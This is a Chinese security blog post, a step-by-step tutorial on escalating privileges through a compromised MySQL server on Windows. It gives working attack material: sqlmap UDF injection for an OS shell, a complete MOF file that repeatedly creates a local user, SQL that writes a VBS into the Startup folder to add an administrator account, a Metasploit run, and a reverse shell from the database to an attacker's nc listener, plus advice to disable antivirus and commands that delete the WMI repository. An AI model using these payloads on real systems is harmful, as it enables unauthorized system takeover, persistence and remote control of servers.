Mysql提权

博主： alexsel
发布时间：2020 年 05 月 20 日
1420 次浏览
暂无评论
6136字数
分类：网络安全

Mysql提权介绍

系统漏洞利用比较困难的情况下，我们可以采用数据库提权的方式，不过数据库提权有其条件：服务器开启数据库服务以及获取到最高权限用户的密码。除了Access是数据库之外，其他数据库基本都存在数据库提权的可能。

常见密码获取方式

1.读取网站数据库配置文件（了解其命名规则以及查找技巧）

sql data inc config conn database common include等

2.读取数据库存储或备份文件（了解其数据库存储格式以及对应内容）

@@basedir/data/数据库名/表名.myd

3.利用脚本暴力猜解（了解数据库是否支持外联以及如何开启外联）

mysql/user/host中的host字段就是可以链接的地址，修改为%就是允许任何地址访问。

获取user数据库下的admin的数据，我们需要查看数据文件中的mysql/data/user/admin.myd

常见的MYSQL提权方式

UDF导出提权

1.mysql<5.1 导出目录 C:/windows或system32，2003放置在c:/windows/system32目录，2000放置于c:\winnt\system32目录下。

2.mysql>=5.1 导出安装目录/lib/plugin/，一般情况下大于5.1版本中的plugin目录是不存在的，所以我们就需要手工创建或者使用NTFS流创建如上。

利用自定义执行函数导出dll文件进行命令执行

select version() select @@basedir

手动创建plugin目录或利用NTFS流创建

select 'x' intodumpfile '目录/lib/plugin::INDEX_ALLOCATION';

利用sqlmap进行UDF提权

我们在sqlmap中执行如下命令

python3 sqlmap.py -d "mysql://root:123456@192.168.252.182:3306/mysql" --os-shell

其中参数代表的意思是数据库类型://数据库用户名:密码@ip:端口/数据库名

这里sqlmap会自动生成一个dll文件，我们记得将杀毒软件进行关闭，否则dll文件可能被杀软干掉

利用脚本进行UDF提权

这个脚本也是比较方便的，可以直观的获取数据库的基本信息并简化提权步骤

首先我们运行脚本，填写基本信息，点击提交

接下来我们就导出udf，由于我们的版本是5.7.26所以我们导出的位置是mysql安装目录\lib\plugin

导出成功，接着我们创建sys_eval函数

最后我们尝试执行命令，我们可以发现命令成功执行。

MOF提权

MOF提权的条件十分苛刻，大致条件如下：

windows 03以下的版本
mysql启动身份具有权限读写c:/windows/system32/wbem/mof目录
我们可以使用mysql进行写入操作，也就是secure-file-priv的配置不能为null

我们分析这些条件，首先是03以下的版本，这个条件现在基本上能满足的服务器要么安全防护做得非常好，要么就是一台已经废弃的服务器了。接下来就是需要启动mysql的用户具有读写指定位置的权限，其实有这个权限之后，我们完全可以使用其他的方法进行提权，使用这种鸡肋的方法反而浪费我们的时间。最后一个条件，就是可以向服务器写入文件，这个权限也是很少有服务器开启的，一般都会设置为null。

MOF文件

mof是windows系统的一个文件（路径：c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"，起作用是每隔五秒就会去监控进程的创建和死亡。

提权原理

我们可以使用其来提权的原因是，MOF文件每5秒就会执行，而且权限是system，如果我们可以控制执行的内容，那就相当于获得了system的权限，我们可以通过mysql来替换一个mof文件，这个mof中有一段是vbs脚本，这个vbs大多数是cmd的添加管理员的命令。

提权过程

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

在这个脚本中，它会每5秒创建一次test用户，我们可以自定义脚本执行的内容。接下来我们在mysql中执行如下命令将其写入到c:/windows/system32/wbem/mof/目录下。

select load_file("C:/phpstudy/WWW/nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

这里不能使用outfile，因为其会在文件的末尾写入新行，导致mof在被当作二进制文件的时候无法正常执行。如果我们使用phpstudy来进行测试会失败，因为phpstudy的权限无法修改mof文件。

结束脚本执行

我们了解过之前的提权逻辑之后，我们知道这个脚本会一直执行，就算我们删除帐号，还是会继续创建，所以需要知道如何将脚本停下并清理痕迹。在cmd中执行如下代码

net stop winmgmt
net user ghtwf011 /delete
del c:/windows/system32/wbem/repository
net start winmgmt

启动项提权

启动项是我们在电脑启动之后，会自动执行一些程序，启动项提权的原理就是将我们需要提权命令添加到启动项中，然后等待主机重新启动即可完成提权。

启动项测试

我们可以在菜单中看到启动这个选项，其就是启动项的目录所在地，我们当前测试的路径如下

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

我们可以在这个目录下写一个添加账户的命令

net user test -Ab00__abcd /add

我们将命令写入到一个.bat文件中，这是windows的一个批处理文件类型，紧接着我们重启服务器

重启之后，我们可以看到用户已经被添加

Mysql添加启动项

我们刚才尝试过手动添加启动项了，那么使用mysql来添加启动项的原理就很好理解了，基本上需要满足如下条件：

secure_file_priv的值不为null
已经知道mysql的root账户的密码
可以向启动项目录下写入文件

当满足以上条件之后，我们就可以在mysql中使用命令来向启动项添加一个自启动文件，最终完成提权。

create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user hpdoger 123456 /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators hpdoger /add"",0) " ); 
select * from a into outfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a.vbs";

我们远程连接mysql数据库使用root账户登录，然后执行以上命令

最终我们可以看到，在目标主机的启动项下面出现了a.vbs的脚本，我们可以看到其中的内容就是我们在mysql中添加的内容

我们可以看到，我们在代码中写的test用户已经被创建了。

使用MSF添加启动项

添加启动项我们也可以直接使用msf，我们首先在msf中设置如下内容

set username root
set password 123456
set rhosts 192.168.252.182
exploit

我们看到msf提示在目标主机中创建的相应的文件

我们在目标主机中查看是否存在这个文件

由于我们没有设置监听的端口，这里使用的是默认的4444端口，那我们就监听4444端口，然后重启目标主机

最终反弹会了目标主机的shell，(我这里有点小问题)。

反弹shell提权

反弹shell使用的命令是mysql中的backshell函数，由于我们是使用mysql的root账户登录的，所以我们反弹回来的shell也是system权限的。

首先我们需要在攻击机监听端口nc -lvp 12345

接着在目标主机的mysql中执行

select backshell("192.168.252.133",12345);

接下来在我们之前使用的udf提权脚本中进行shell的反弹即可。

参考文章

https://xz.aliyun.com/t/7392
https://xz.aliyun.com/t/2719

最后修改：2020 年 09 月 20 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

PHP_Session反序列化漏洞
浏览次数: 5918
10种方法绕过云锁以及tamper
浏览次数: 5729
红队实验七
浏览次数: 3280
Bypass-云锁绕过
浏览次数: 3206
Linux提权总结
浏览次数: 2750

111
师傅好文章，图片坏了好多
Ulysses
不过最新版的云锁已经不能用这种方法绕过了⌇●﹏●⌇
Ulysses
真榜！学到了ヾ(≧∇≦*)ゝ
未尽
感谢师傅提供的思路，能否给个收款码，请师傅喝杯咖啡。

ThinkPHP框架漏洞分析
浏览次数: 557
XSS挑战
浏览次数: 1361
Redis未授权访问
浏览次数: 1261
Upload-lab 11-19
浏览次数: 1379
C语言-初探指针
浏览次数: 1315

Mysql提权

alexsel • 2020 年 05 月 20 日

<h2>Mysql提权介绍</h2><p>系统漏洞利用比较困难的情况下，我们可以采用数据库提权的方式，不过数据库提权有其条件：<strong>服务器开启数据库服务以及获取到最高权限用户的密码</strong>。除了Access是数据库之外，其他数据库基本都存在数据库提权的可能。</p><h2>常见密码获取方式</h2><p>1.读取网站数据库配置文件（了解其命名规则以及查找技巧）</p><p><code>sql data inc config conn database common include</code>等</p><p>2.读取数据库存储或备份文件（了解其数据库存储格式以及对应内容）</p><p><code>@@basedir/data/数据库名/表名.myd</code></p><p>3.利用脚本暴力猜解（了解数据库是否支持外联以及如何开启外联）</p><p><code>mysql/user/host</code>中的<code>host</code>字段就是可以链接的地址，修改为%就是允许任何地址访问。</p><p>获取user数据库下的admin的数据，我们需要查看数据文件中的<code>mysql/data/user/admin.myd</code></p><h2>常见的MYSQL提权方式</h2><h3>UDF导出提权</h3><p>1.<code>mysql&lt;5.1</code> 导出目录 <code>C:/windows或system32</code>，2003放置在<code>c:/windows/system32</code>目录，2000放置于<code>c:\winnt\system32</code>目录下。</p><p>2.<code>mysql&gt;=5.1</code> 导出<code>安装目录/lib/plugin/</code>，一般情况下大于5.1版本中的<code>plugin</code>目录是不存在的，所以我们就需要手工创建或者使用<code>NTFS</code>流创建如上。</p><p>利用自定义执行函数导出dll文件进行命令执行</p><pre><code class="lang-mysql">select version() select @@basedir</code></pre><p>手动创建plugin目录或利用NTFS流创建</p><pre><code class="lang-mysql">select 'x' intodumpfile '目录/lib/plugin::INDEX_ALLOCATION';</code></pre><h4>利用sqlmap进行UDF提权</h4><p>我们在sqlmap中执行如下命令</p><pre><code class="lang-mysql">python3 sqlmap.py -d &quot;mysql://root:123456@192.168.252.182:3306/mysql&quot; --os-shell </code></pre><p>其中参数代表的意思是<code>数据库类型://数据库用户名:密码@ip:端口/数据库名</code></p><p><img src="https://www.helloimg.com/images/2020/09/16/1b312bc6df3d92d1b.png" alt="" title="" style=""></p><p>这里<code>sqlmap</code>会自动生成一个<code>dll</code>文件，我们记得将杀毒软件进行关闭，否则<code>dll</code>文件可能被杀软干掉</p><h4>利用脚本进行UDF提权</h4><p>这个脚本也是比较方便的，可以直观的获取数据库的基本信息并简化提权步骤</p><p><img src="https://www.helloimg.com/images/2020/09/16/2383542c5bcf15f97.png" alt="" title="" style=""></p><p>首先我们运行脚本，填写基本信息，点击提交</p><p><img src="https://www.helloimg.com/images/2020/09/16/3a25cef96e0e69710.png" alt="" title="" style=""></p><p>接下来我们就导出udf，由于我们的版本是5.7.26所以我们导出的位置是<code>mysql安装目录\lib\plugin</code></p><p><img src="https://www.helloimg.com/images/2020/09/16/425e11164479f64ff.png" alt="" title="" style=""></p><p>导出成功，接着我们创建<code>sys_eval</code>函数</p><p><img src="https://www.helloimg.com/images/2020/09/16/5ba92ade402765ace.png" alt="" title="" style=""></p><p>最后我们尝试执行命令，我们可以发现命令成功执行。</p><p><img src="https://www.helloimg.com/images/2020/09/16/6aa303c920e4bc1d9.png" alt="" title="" style=""></p><h3>MOF提权</h3><p><code>MOF</code>提权的条件十分苛刻，大致条件如下：</p><ul><li><code>windows 03</code>以下的版本</li><li><code>mysql</code>启动身份具有权限读写<code>c:/windows/system32/wbem/mof</code>目录</li><li>我们可以使用<code>mysql</code>进行写入操作，也就是<code>secure-file-priv</code>的配置不能为<code>null</code></li></ul><p>我们分析这些条件，首先是<code>03</code>以下的版本，这个条件现在基本上能满足的服务器要么安全防护做得非常好，要么就是一台已经废弃的服务器了。接下来就是需要启动mysql的用户具有读写指定位置的权限，其实有这个权限之后，我们完全可以使用其他的方法进行提权，使用这种鸡肋的方法反而浪费我们的时间。最后一个条件，就是可以向服务器写入文件，这个权限也是很少有服务器开启的，一般都会设置为<code>null</code>。</p><h4>MOF文件</h4><p><code>mof</code>是<code>windows</code>系统的一个文件（路径：<code>c:/windows/system32/wbem/mof/nullevt.mof</code>）叫做"托管对象格式"，起作用是每隔五秒就会去监控进程的创建和死亡。</p><h4>提权原理</h4><p>我们可以使用其来提权的原因是，<code>MOF</code>文件每5秒就会执行，而且权限是<code>system</code>，如果我们可以控制执行的内容，那就相当于获得了<code>system</code>的权限，我们可以通过<code>mysql</code>来替换一个<code>mof</code>文件，这个<code>mof</code>中有一段是<code>vbs</code>脚本，这个<code>vbs</code>大多数是<code>cmd</code>的添加管理员的命令。</p><h4>提权过程</h4><pre><code class="lang-shell">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)
instance of __EventFilter as $EventFilter
{
EventNamespace = &quot;Root\\Cimv2&quot;;
Name = &quot;filtP2&quot;;
Query = &quot;Select * From __InstanceModificationEvent &quot;
&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;
&quot;And TargetInstance.Second = 5&quot;;
QueryLanguage = &quot;WQL&quot;;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = &quot;consPCSV2&quot;;
ScriptingEngine = &quot;JScript&quot;;
ScriptText =
&quot;var WSH = new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user test test /add\&quot;)&quot;;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};</code></pre><p>在这个脚本中，它会每5秒创建一次<code>test</code>用户，我们可以自定义脚本执行的内容。接下来我们在mysql中执行如下命令将其写入到<code>c:/windows/system32/wbem/mof/</code>目录下。</p><pre><code class="lang-mysql">select load_file(&quot;C:/phpstudy/WWW/nullevt.mof&quot;) into dumpfile &quot;c:/windows/system32/wbem/mof/nullevt.mof&quot;</code></pre><p>这里不能使用<code>outfile</code>，因为其会在文件的末尾写入新行，导致mof在被当作二进制文件的时候无法正常执行。如果我们使用<code>phpstudy</code>来进行测试会失败，因为<code>phpstudy</code>的权限无法修改<code>mof</code>文件。</p><h4>结束脚本执行</h4><p>我们了解过之前的提权逻辑之后，我们知道这个脚本会一直执行，就算我们删除帐号，还是会继续创建，所以需要知道如何将脚本停下并清理痕迹。在<code>cmd</code>中执行如下代码</p><pre><code class="lang-shell">net stop winmgmt
net user ghtwf011 /delete
del c:/windows/system32/wbem/repository
net start winmgmt</code></pre><h3>启动项提权</h3><p>启动项是我们在电脑启动之后，会自动执行一些程序，启动项提权的原理就是将我们需要提权命令添加到启动项中，然后等待主机重新启动即可完成提权。</p><h4>启动项测试</h4><p>我们可以在菜单中看到启动这个选项，其就是启动项的目录所在地，我们当前测试的路径如下</p><pre><code class="lang-shell">C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code></pre><p>我们可以在这个目录下写一个添加账户的命令</p><pre><code class="lang-shell">net user test -Ab00__abcd /add</code></pre><p><img src="https://www.helloimg.com/images/2020/09/16/73f525945c3a8667b.png" alt="" title="" style=""></p><p>我们将命令写入到一个<code>.bat</code>文件中，这是<code>windows</code>的一个批处理文件类型，紧接着我们重启服务器</p><p><img src="https://www.helloimg.com/images/2020/09/16/8dbe5e1d13cb5d3e4.png" alt="" title="" style=""></p><p>重启之后，我们可以看到用户已经被添加</p><h4>Mysql添加启动项</h4><p>我们刚才尝试过手动添加启动项了，那么使用mysql来添加启动项的原理就很好理解了，基本上需要满足如下条件：</p><ul><li><code>secure_file_priv</code>的值不为<code>null</code></li><li>已经知道<code>mysql</code>的<code>root</code>账户的密码</li><li>可以向启动项目录下写入文件</li></ul><p>当满足以上条件之后，我们就可以在<code>mysql</code>中使用命令来向启动项添加一个自启动文件，最终完成提权。</p><pre><code class="lang-mysql">create table a (cmd text); 
insert into a values (&quot;set wshshell=createobject (&quot;&quot;wscript.shell&quot;&quot;) &quot; ); 
insert into a values (&quot;a=wshshell.run (&quot;&quot;cmd.exe /c net user hpdoger 123456 /add&quot;&quot;,0) &quot; ); 
insert into a values (&quot;b=wshshell.run (&quot;&quot;cmd.exe /c net localgroup administrators hpdoger /add&quot;&quot;,0) &quot; ); 
select * from a into outfile &quot;C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a.vbs&quot;;</code></pre><p>我们远程连接mysql数据库使用root账户登录，然后执行以上命令</p><p><img src="https://www.helloimg.com/images/2020/09/16/95f7f9184c961ccc2.png" alt="" title="" style=""></p><p><img src="https://www.helloimg.com/images/2020/09/16/10ca5822be1fc13b16.png" alt="" title="" style=""></p><p>最终我们可以看到，在目标主机的启动项下面出现了<code>a.vbs</code>的脚本，我们可以看到其中的内容就是我们在<code>mysql</code>中添加的内容</p><p><img src="https://www.helloimg.com/images/2020/09/16/110add5866c3a78af2.png" alt="" title="" style=""></p><p>我们可以看到，我们在代码中写的<code>test</code>用户已经被创建了。</p><p><img src="https://www.helloimg.com/images/2020/09/16/12d78f2ff0e4b3c2f6.png" alt="" title="" style=""></p><h4>使用MSF添加启动项</h4><p>添加启动项我们也可以直接使用msf，我们首先在msf中设置如下内容</p><pre><code class="lang-shell">set username root
set password 123456
set rhosts 192.168.252.182
exploit</code></pre><p>我们看到msf提示在目标主机中创建的相应的文件</p><p><img src="https://www.helloimg.com/images/2020/09/16/13d39db602af18baa0.png" alt="" title="" style=""></p><p>我们在目标主机中查看是否存在这个文件</p><p><img src="https://www.helloimg.com/images/2020/09/16/14eb33fe02581dee33.png" alt="" title="" style=""></p><p>由于我们没有设置监听的端口，这里使用的是默认的4444端口，那我们就监听4444端口，然后重启目标主机</p><p><img src="https://www.helloimg.com/images/2020/09/16/15a49f7d47e9cf3b9b.png" alt="" title="" style=""></p><p>最终反弹会了目标主机的shell，(我这里有点小问题)。</p><h3>反弹shell提权</h3><p>反弹shell使用的命令是<code>mysql</code>中的<code>backshell</code>函数，由于我们是使用<code>mysql</code>的root账户登录的，所以我们反弹回来的shell也是<code>system</code>权限的。</p><p>首先我们需要在攻击机监听端口<code>nc -lvp 12345</code></p><p><img src="https://www.helloimg.com/images/2020/09/16/16fb75f6e111dbd4d2.png" alt="" title="" style=""></p><p>接着在目标主机的mysql中执行</p><pre><code class="lang-mysql">select backshell(&quot;192.168.252.133&quot;,12345);</code></pre><p>接下来在我们之前使用的udf提权脚本中进行shell的反弹即可。</p><p><img src="https://www.helloimg.com/images/2020/09/16/171e4e2e6b30bfad91.png" alt="" title="" style=""></p><p>参考文章</p><blockquote><p><span class="external-link"><a class="no-external-link" href="https://xz.aliyun.com/t/7392" target="_blank"><i data-feather="external-link"></i>https://xz.aliyun.com/t/7392</a></span></p><p><span class="external-link"><a class="no-external-link" href="https://xz.aliyun.com/t/2719" target="_blank"><i data-feather="external-link"></i>https://xz.aliyun.com/t/2719</a></span></p></blockquote>

Mysql提权介绍

常见密码获取方式

常见的MYSQL提权方式

UDF导出提权

利用sqlmap进行UDF提权

利用脚本进行UDF提权

MOF提权

MOF文件

提权原理

提权过程

结束脚本执行

启动项提权

启动项测试

Mysql添加启动项

使用MSF添加启动项

反弹shell提权

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Mysql提权

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款